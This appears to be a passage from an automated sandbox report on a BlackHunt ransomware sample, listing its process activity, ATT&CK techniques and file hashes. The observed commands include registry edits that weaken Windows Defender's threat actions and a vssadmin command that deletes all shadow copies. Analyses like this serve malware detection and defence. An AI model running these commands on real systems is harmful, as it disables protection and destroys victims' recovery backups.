C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:4408
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:5036
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:352
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2920
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:5016 -
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:5796
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:9320
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:12252
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:19732
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:20100
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv jwNkd8HpF0qpEQIcZ9aiww.0.21⤵PID:6456
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 13500 -ip 135001⤵PID:13572
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD527769f56f56111f1415b9ba9dac314dd
SHA151d6ff728bd7969845278075ef85c9f091d849c1
SHA256510787763da9472e276fd689f0b7f9e234bae0b5ba6be51c750910b6048ed04d
SHA512afd048cdcdf59f4b7768d7f1cf69e75e7ff77bb02a2451b2095a99b7ed0906c334c46448080610e71d82a0d4bd4d1ce6bc5a06bf6a6076e20b29992bed5af077
-
Filesize
12KB
MD586014872df0ca3192dd474471147e339
SHA1a8c5d8fcd7b5b63b363e13dad6f3aa7990a00401
SHA256f245a20c6146ed791a62f533d6f7115e060005c41f79ff51612e6f06b56eeb59
SHA512d1b91a76cef6ecc14687b938ea51cd51cec34316a616465e01930d0c8691d7997d24059409d398d195e1dd574e5b8b0d9ea3bf2da6a9f7653819e8e0dfc66be8
-
Filesize
684B
MD5c1e5c4f347143c6b71726286debd41e7
SHA13f14a8d4d6f481b7c76c9072256223ed96306152
SHA256130e25bda2abbd1539bd12fa4648558eda702856261615e1fcf24f646202f6ee
SHA5129370fff4d39e3a29113a079e4b602a51921b42623c7e726cb48a7e2267f65bd848f8ab335998d8c4eda213e5a7620d0e1cbfb751a7e9b46bb5fabaa4c25a51fd